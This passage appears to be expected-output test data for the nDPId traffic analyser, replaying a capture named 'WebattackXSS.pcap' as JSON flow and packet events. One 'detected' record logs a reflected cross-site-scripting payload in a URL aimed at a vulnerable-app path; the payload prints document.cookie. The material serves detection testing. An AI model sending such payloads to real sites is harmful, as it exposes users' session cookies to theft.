+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8045,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":568,"flow_packet_id":2,"flow_last_seen":1499347936727,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347936727,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhcyowg88EHa6gqAScSBLswAAAgQFtAQCCAoD5mu3ATyaQwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8046,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":568,"flow_packet_id":3,"flow_last_seen":1499347936728,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347936728,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0IMNAAD4GpRWsEAABwKgKMoXMAFAQdrqCqMIPPYAQAOXqugAAAQEICgE8mkMD5mu3"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8053,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":492,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347802549,"flow_last_seen":1499347807841,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347936881,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32852,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8053,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":492,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347802549,"flow_last_seen":1499347807841,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347936881,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32852,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8053,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":493,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347805119,"flow_last_seen":1499347810842,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347936881,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32878,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8053,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":493,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347805119,"flow_last_seen":1499347810842,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347936881,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32878,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8053,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":494,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347806390,"flow_last_seen":1499347811528,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347936881,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32892,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8053,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":494,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347806390,"flow_last_seen":1499347811528,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347936881,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32892,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8053,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":496,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347810243,"flow_last_seen":1499347815843,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347936881,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32932,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8053,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":496,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347810243,"flow_last_seen":1499347815843,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347936881,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32932,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8053,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":497,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347811525,"flow_last_seen":1499347816843,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347936881,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32946,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8053,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":497,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347811525,"flow_last_seen":1499347816843,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347936881,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32946,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8053,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":458,"flow_state":"finished","flow_packets_processed":311,"flow_first_seen":1499347743331,"flow_last_seen":1499347811268,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1870,"flow_tot_l4_payload_len":232375,"flow_avg_l4_payload_len":747,"midstream":0,"thread_ts_msec":1499347936881,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60464,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8062,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":569,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347939286,"flow_last_seen":1499347939286,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347939286,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34278,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8062,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":569,"flow_packet_id":1,"flow_last_seen":1499347939286,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347939286,"pkt":"ABm5CmnxAMGxFOsxCABFAAA86O9AAD4G3OCsEAABwKgKMoXmAFBSpnQtAAAAAKACchBz+wAAAgQFtAQCCAoBPJzCAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8063,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":569,"flow_packet_id":2,"flow_last_seen":1499347939286,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347939286,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQheYnhiyyUqZ0LqAScSCuhQAAAgQFtAQCCAoD5m42ATycwgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8064,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":569,"flow_packet_id":3,"flow_last_seen":1499347939286,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347939286,"pkt":"ABm5CmnxAMGxFOsxCABFAAA06PBAAD4G3OesEAABwKgKMoXmAFBSpnQuJ4Yss4AQAOVNjQAAAQEICgE8nMID5m42"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8074,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":570,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347940593,"flow_last_seen":1499347940593,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347940593,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34292,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8074,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":570,"flow_packet_id":1,"flow_last_seen":1499347940593,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347940593,"pkt":"ABm5CmnxAMGxFOsxCABFAAA87cVAAD4G2AqsEAABwKgKMoX0AFCR9XPMAAAAAKACchAzuAAAAgQFtAQCCAoBPJ4JAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8075,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":570,"flow_packet_id":2,"flow_last_seen":1499347940593,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347940593,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhfTE5Ae8kfVzzaAScSD0kgAAAgQFtAQCCAoD5m99ATyeCQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8076,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":570,"flow_packet_id":3,"flow_last_seen":1499347940594,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347940594,"pkt":"ABm5CmnxAMGxFOsxCABFAAA07cZAAD4G2BGsEAABwKgKMoX0AFCR9XPNxOQHvYAQAOWTmgAAAQEICgE8ngkD5m99"} 
+01118{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8089,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":569,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347939286,"flow_last_seen":1499347941874,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1499347941874,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34278,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/?name=%3Cscript%3Econsole.log%28%27TNRH0PFRPCFVXECFZU2OUYBTDZQVIWB8HBZ1VC7EXA9PGMGBWA%27%29%3Bconsole.log%28document.cookie%29%3B%3C%2Fscript%3E","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8099,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":571,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347943146,"flow_last_seen":1499347943146,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347943146,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34318,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8099,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":571,"flow_packet_id":1,"flow_last_seen":1499347943146,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347943146,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8TwNAAD4Gds2sEAABwKgKMoYOAFBjnu+EAAAAAKACchDjvgAAAgQFtAQCCAoBPKCHAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8100,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":571,"flow_packet_id":2,"flow_last_seen":1499347943146,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347943146,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhg4T7s6FY57vhaAScSCMRwAAAgQFtAQCCAoD5nH8ATyghwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8101,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":571,"flow_packet_id":3,"flow_last_seen":1499347943147,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347943147,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0TwRAAD4GdtSsEAABwKgKMoYOAFBjnu+FE+7OhoAQAOUrTgAAAQEICgE8oIgD5nH8"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8108,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":572,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347944440,"flow_last_seen":1499347944440,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347944440,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34332,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8108,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":572,"flow_packet_id":1,"flow_last_seen":1499347944440,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347944440,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8SUNAAD4GfI2sEAABwKgKMoYcAFB5iuiIAAAAAKACchDTfAAAAgQFtAQCCAoBPKHLAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8109,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":572,"flow_packet_id":2,"flow_last_seen":1499347944440,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347944440,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhhyVeGrjeYroiaAScSBc2gAAAgQFtAQCCAoD5nM\/ATyhywEDAwc="} 
+00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8110,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":572,"flow_packet_id":3,"flow_last_seen":1499347944441,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347944441,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0SURAAD4GfJSsEAABwKgKMoYcAFB5iuiJlXhq5IAQAOX74QAAAQEICgE8ocsD5nM\/"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8117,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":573,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347945720,"flow_last_seen":1499347945720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347945720,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34346,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8117,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":573,"flow_packet_id":1,"flow_last_seen":1499347945720,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347945720,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8sjdAAD4GE5msEAABwKgKMoYqAFDdpBE8AAAAAKACchBFYQAAAgQFtAQCCAoBPKMLAAAAAAEDAwc="} 
+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8118,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":573,"flow_packet_id":2,"flow_last_seen":1499347945720,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347945720,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhiqh1kGM3aQRPaAScSDqdwAAAgQFtAQCCAoD5nR\/ATyjCwEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8119,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":573,"flow_packet_id":3,"flow_last_seen":1499347945721,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347945721,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0sjhAAD4GE6CsEAABwKgKMoYqAFDdpBE9odZBjYAQAOWJfwAAAQEICgE8owsD5nR\/"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":498,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347812797,"flow_last_seen":1499347817844,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347947010,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32960,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":498,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347812797,"flow_last_seen":1499347817844,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347947010,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32960,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":499,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347814066,"flow_last_seen":1499347819845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347947010,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32974,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":499,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347814066,"flow_last_seen":1499347819845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347947010,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32974,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":500,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347815351,"flow_last_seen":1499347820846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347947010,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32988,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":500,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347815351,"flow_last_seen":1499347820846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347947010,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32988,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":501,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347816657,"flow_last_seen":1499347821846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347947010,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33002,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":501,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347816657,"flow_last_seen":1499347821846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347947010,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33002,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":502,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347819250,"flow_last_seen":1499347824846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347947010,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33028,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":502,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347819250,"flow_last_seen":1499347824846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347947010,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33028,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
